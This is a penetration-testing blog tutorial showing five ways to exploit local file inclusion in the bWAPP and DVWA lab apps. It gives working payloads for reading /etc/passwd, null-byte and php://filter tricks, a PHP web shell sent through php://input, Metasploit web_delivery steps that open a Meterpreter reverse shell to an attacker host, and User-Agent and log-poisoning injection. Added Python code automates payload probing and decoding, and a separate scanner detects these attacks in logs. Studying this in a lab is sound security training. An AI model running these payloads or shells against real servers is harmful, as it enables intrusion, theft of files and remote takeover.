5 Ways to Exploit LFI Vulnerability


Hacking Articles

Raj Chandel's Blog




posted in KALI LINUX, PENETRATION TESTING, WEBSITE HACKING on FEBRUARY 15, 2017

by RAJ CHANDEL

The main aim of this article is to share ways of attacking a web server using various techniques when the server suffers from a file inclusion vulnerability. As we are all aware, an LFI vulnerability allows a user to include a file on the server through a parameter in the URL typed into the browser. In this article I have used two different platforms, bWAPP and DVWA, which contain file inclusion vulnerabilities, and through them I have performed LFI attacks in FIVE different ways.

Basic local file inclusion

Open the target IP in the browser and log in to bWAPP as bee:bug. Now choose the bug Remote & Local File Inclusion (RFI/LFI) and click on Hack.

Here the requested web page, which suffers from RFI and LFI vulnerabilities, opens. You will find a prompt to select a language from the given drop-down list, and when you click on the Go button the selected language file gets included via the URL. To perform the basic attack, manipulate

http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go

into

http://192.168.1.101/bWAPP/rlfi.php?language=/etc/passwd

In a basic LFI attack we can read the content of a file directly by supplying its path, either relative with (../) traversal sequences or absolute, starting with (/). If you look at the screenshot below you will find that I have accessed the password file when the above URL is executed in the browser.
Null byte

In some scenarios the basic local file inclusion attack above may not work because of a higher security level. In the image below you can observe that I failed to read the password file when executing the same path in the URL. When we face this kind of problem we go for a NULL BYTE attack. The trick relies on the application appending a fixed suffix such as .php to the supplied name: a %00 in the parameter terminates the string before the suffix is reached, but only on PHP older than 5.3.4, since later versions reject paths containing a null byte.
Now turn on Burp Suite to capture the browser request: select the Proxy tab and turn intercept on. Do not forget to set the browser proxy while making use of Burp Suite.

Now, inside Burp Suite, send the intercepted request to Repeater.

Inside Repeater you can analyse the sent request and the response generated by it. From the screenshot it is clear that /etc/passwd is not working and I am not able to read the password file.

In the following screenshot you can see that I forwarded the request after adding a null character (%00) at the end of the path, /etc/passwd%00, and clicked on Go. Then on the right side of the window the password file opens as the response.
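The payloads from the basic and null-byte sections above, as an added example that is not part of the original article: a small Python probe that tries the absolute path, ../ traversal at increasing depth and then the same again with %00, and recognises /etc/passwd in the response by its root line. The target URL and parameter name are placeholders taken from the bWAPP URL in the article, the fetch function is injected so it can be swapped for a real HTTP client, and the fake server used to run it offline is constructed to mimic the two situations the article describes (a plain include, and an include that appends .php on old or new PHP).

```python
import posixpath
import re
from typing import Callable, Iterator, Optional

# The root account line of /etc/passwd: <name>:<pw>:0:0: at the start of a line.
PASSWD_RE = re.compile(r"^[a-z_][a-z0-9_-]*:[^:\n]*:0:0:", re.MULTILINE)


def lfi_payloads(target_file: str = "/etc/passwd", max_depth: int = 6) -> Iterator[str]:
    """Yield candidate values for the vulnerable parameter, cheapest first.

    Order: absolute path, then ../ traversal at depth 1..max_depth, then every
    one of those again with a trailing %00. The null byte only helps when the
    application appends a fixed suffix (e.g. ".php") AND runs PHP < 5.3.4;
    newer PHP rejects paths containing NUL, so those payloads just fail.
    """
    rel = target_file.lstrip("/")
    plain = [target_file] + ["../" * d + rel for d in range(1, max_depth + 1)]
    yield from plain
    for p in plain:
        yield p + "%00"


def build_url(base: str, param: str, payload: str) -> str:
    """Attach the payload raw: it is already in URL form, and %00 must not become %2500."""
    return f"{base}?{param}={payload}"


def looks_like_passwd(body: str) -> bool:
    """True when the response carries an /etc/passwd root entry."""
    return bool(PASSWD_RE.search(body))


def probe(base: str, param: str, fetch: Callable[[str], str],
          **kwargs) -> Optional[str]:
    """Return the first payload whose response discloses /etc/passwd, else None."""
    for payload in lfi_payloads(**kwargs):
        if looks_like_passwd(fetch(build_url(base, param, payload))):
            return payload
    return None


# ---- constructed offline stand-in for the target (not a real bWAPP) ----------
PASSWD_SAMPLE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)


def fake_server(webroot: str = "/var/www/bWAPP", append_suffix: bool = False,
                old_php: bool = True) -> Callable[[str], str]:
    """Model include($_GET['language'] . suffix) for the cases in the article."""
    def fetch(url: str) -> str:
        value = url.split("language=", 1)[1]
        path = value + (".php" if append_suffix else "")
        if "%00" in path:
            if not old_php:  # PHP >= 5.3.4 refuses the path outright
                return "Warning: include(): Filename contains null byte"
            path = path.split("%00", 1)[0]  # old PHP: the C string ends at NUL
        resolved = posixpath.normpath(posixpath.join(webroot, path))
        if resolved == "/etc/passwd":
            return PASSWD_SAMPLE
        return "Warning: include(): failed to open stream: No such file"
    return fetch


if __name__ == "__main__":
    base = "http://192.168.1.101/bWAPP/rlfi.php"
    print("plain include     ->", probe(base, "language", fake_server()))
    print(".php suffix, old  ->", probe(base, "language", fake_server(append_suffix=True)))
    print(".php suffix, new  ->", probe(base, "language", fake_server(append_suffix=True, old_php=False)))
```

Against a live target, pass a real fetcher such as `lambda u: urllib.request.urlopen(u).read().decode()` (with the session cookie added, since bWAPP requires a login) instead of `fake_server()`; the third case shows why a reader on current PHP, like the commenter at the bottom of this page, sees the %00 variant fail.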

Base64 encoded

There is another way to exploit LFI when the security level is high and you are unable to view the content of a PHP file: the php://filter wrapper. It returns the file base64-encoded instead of including it, so the source of .php files that would otherwise be executed on inclusion can be read as well. Use the following URL:

http://192.168.1.101/bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd

Here, from the screenshot, you can see the content of the password file encoded in base64; copy the whole encoded text.

I am using Hackbar, a Firefox plugin, to decode the copied text.

Now a pop-up box will open; paste the copied encoded text inside it and click on OK.

From the given screenshot you can view the result and read the content of the password file.
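The php://filter step above, as an added example that is not part of the original article: Python that builds the wrapper string for any resource and decodes the encoded file out of the returned page, the step the article performs with the Hackbar plugin. The page body it runs on is constructed to look like the include() output embedded in the surrounding HTML; the PHP source inside it is invented for the example and is not bWAPP's code.

```python
import base64
import binascii
import re
from typing import Optional


def filter_payload(resource: str, encoding: str = "base64") -> str:
    """Value for the vulnerable parameter: the file comes back encoded instead
    of being executed, which is what makes .php source readable via include()."""
    return f"php://filter/read=convert.{encoding}-encode/resource={resource}"


# A run of base64 alphabet long enough not to be an ordinary word or HTML token.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def extract_encoded_file(body: str) -> Optional[str]:
    """Decode the included file from a page that wraps it in HTML.

    include() prints the encoded file in the middle of the page template, so
    take the longest base64 run rather than assuming the whole body is base64.
    Missing '=' padding is repaired because copy/paste from a browser often
    drops it; anything that still fails strict decoding is reported as None.
    """
    runs = B64_RUN.findall(body)
    if not runs:
        return None
    blob = max(runs, key=len)
    blob += "=" * (-len(blob) % 4)
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except binascii.Error:
        return None


# ---- constructed response (invented PHP source, not bWAPP's real file) -------
PHP_SOURCE = "<?php\n$file = $_GET['language'];\ninclude($file);\n?>\n"
SAMPLE_PAGE = (
    "<html><body><h1>bWAPP</h1><div id=\"main\">"
    + base64.b64encode(PHP_SOURCE.encode()).decode()
    + "</div></body></html>"
)

if __name__ == "__main__":
    print(filter_payload("/etc/passwd"))
    print(extract_encoded_file(SAMPLE_PAGE))
```

Swap `/etc/passwd` for a path such as `rlfi.php` in `filter_payload()` to pull application source; `convert.base64-encode` is used because plain inclusion of a .php file would run it rather than display it.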

PHP Input

Using the php://input wrapper we will execute injected PHP code to exploit the LFI vulnerability. This works because include() reads the raw body of the request when given php://input, but only when allow_url_include is On, since PHP treats php://input as a URL wrapper for inclusion purposes. With the help of Hackbar I am going to perform this task, in which first we need to load the URL of the targeted web page as you can see in the given screenshot.

http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go

Now manipulate the above URL to use the php://input wrapper:

http://192.168.1.101/bWAPP/rlfi.php?language=php://input&cmd=ls

Then select the check box to enable Post data, which makes Hackbar send the request as a POST, and add the cmd payload <?php system($_GET['cmd']); ?> in the given text area as shown in the following screenshot; finally click on Execute.

This will show the directory listing of the victim PC (the output of ls).

Now it is time to connect to the victim through a reverse connection; open a terminal in Kali Linux and type msfconsole to start the Metasploit Framework.

Now type use exploit/multi/script/web_delivery

msf exploit(web_delivery) > set target 1

msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp

msf exploit(web_delivery) > set lhost 192.168.0.104

msf exploit(web_delivery) > set srvport 8081

msf exploit(web_delivery) > exploit

Target 1 is the module's PHP stager, so the payload has to be a php/* one; a windows/* payload is rejected as incompatible with that target.

Copy the highlighted text shown in the window below (the one-line command the module prints).

Paste the copied command into the URL as the value of the cmd parameter, with the system($_GET['cmd']) payload still in the POST body, and execute it as shown in the image.

When the above URL is executed the attacker gets the victim's Meterpreter session inside Metasploit.

msf exploit(web_delivery) > sessions -i 1

meterpreter > sysinfo

/proc/self/environ

If the server is outdated, we can exploit LFI by including the /proc/self/environ file, which holds the environment of the process serving the request, including the HTTP_USER_AGENT variable, where we place our PHP code to execute a command. This works only when the web server exposes the request headers in the PHP process environment (typically when PHP runs as a CGI binary), which is why it is mostly seen on older servers.

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=/proc/self/environ

Now start Burp Suite, capture the browser request and send the captured request to Repeater.

Add the cmd payload <?php system($_GET['cmd']); ?> inside the User-Agent header and send the request with the cmd GET parameter, as shown in the image below. The request in the screenshot is http://192.168.1.8/lfi/lfi.php?file=/var/www/apache2/access.log&cmd=id, which includes the Apache access log instead of /proc/self/environ; the log records the User-Agent of every request, so the same header injection poisons it (the technique covered in the previous post on Apache log poisoning). On the right side of the window you can see the highlighted result of the id command as the response.
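The defender's side of the two header-injection variants above (and of the payloads earlier in the post), as an added example that is not part of the original article: Python that parses Apache combined-format log lines and flags the LFI indicators this post uses, including PHP code planted in the User-Agent header, which is the trace both the /proc/self/environ and the access-log variants leave behind. The log lines are constructed for the example; the IPs and paths mirror the article's lab.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Apache "combined" format:
# host ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators checked against the request line after URL-decoding it twice
# (so ..%252f and %2500 are caught as well as ../ and %00).
REQUEST_INDICATORS = [
    ("traversal", re.compile(r"\.\./|\.\.\\")),
    ("sensitive-path", re.compile(
        r"/etc/(passwd|shadow)|/proc/self/environ|/var/log/|access\.log|error\.log", re.I)),
    ("php-wrapper", re.compile(r"php://(filter|input)|data:|expect://", re.I)),
    ("null-byte", re.compile("\x00")),
]
# PHP planted in the User-Agent: what /proc/self/environ and log poisoning need.
PHP_IN_HEADER = re.compile(r"<\?(php|=)|\b(system|passthru|shell_exec|exec|eval)\s*\(", re.I)


def scan_line(line: str) -> List[str]:
    """Return the indicator names triggered by one log line ([] if clean)."""
    m = COMBINED_RE.match(line)
    if not m:
        return ["unparsed"]
    request = unquote(unquote(m["request"]))
    hits = [name for name, rx in REQUEST_INDICATORS if rx.search(request)]
    if PHP_IN_HEADER.search(unquote(m["ua"])):
        hits.append("php-in-user-agent")
    return hits


def scan_log(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """(line number, indicators) for every line that triggers at least one."""
    findings = []
    for number, line in enumerate(lines, start=1):
        hits = scan_line(line)
        if hits:
            findings.append((number, hits))
    return findings


# ---- constructed log lines mirroring the requests made in this post --------
UA = "Mozilla/5.0 (X11; Linux x86_64) Firefox/51.0"
SAMPLE_LOG = [
    f'192.168.1.8 - - [15/Feb/2017:10:01:02 +0530] "GET /bWAPP/rlfi.php?language=lang_en.php&action=go HTTP/1.1" 200 1634 "-" "{UA}"',
    f'192.168.1.8 - - [15/Feb/2017:10:02:11 +0530] "GET /bWAPP/rlfi.php?language=/etc/passwd HTTP/1.1" 200 2310 "-" "{UA}"',
    f'192.168.1.8 - - [15/Feb/2017:10:03:40 +0530] "GET /bWAPP/rlfi.php?language=../../../etc/passwd%00 HTTP/1.1" 200 2310 "-" "{UA}"',
    f'192.168.1.8 - - [15/Feb/2017:10:05:09 +0530] "GET /bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 3050 "-" "{UA}"',
    '192.168.1.8 - - [15/Feb/2017:10:07:55 +0530] "GET /dvwa/vulnerabilities/fi/?page=/proc/self/environ&cmd=id HTTP/1.1" 200 4120 "-" "<?php system($_GET[\'cmd\']); ?>"',
]

if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

Feed it `open("/var/log/apache2/access.log").read().splitlines()` to run over a real log; the User-Agent check is the one that matters for the techniques in this section, because the request line of a poisoning request can look perfectly ordinary.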

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

ABOUT THE AUTHOR

RAJ CHANDEL
Raj Chandel is a skilled and passionate IT professional, especially in the IT-hacking industry. At present, other than by his name, he can also be called an Ethical Hacker, a Cyber Security Expert and a Penetration Tester, with years of quality experience in the IT and software industry.

← PREVIOUS POST: APACHE LOG POISONING THROUGH LFI
NEXT POST: FILE UPLOAD EXPLOITATION IN BWAPP (BYPASS ALL SECURITY) →

2 Comments

ANKUR January 15, 2018 at 7:02 am

Hi Raj, I tried to do null byte on DVWA but it's not working. I added %00 after etc/passwd but it's not working and I get the response as file not found. Any suggestions please.

RAJ CHANDEL January 20, 2018 at 12:06 pm

It depends from version to version. When we were working on DVWA, our DVWA version was different from yours.
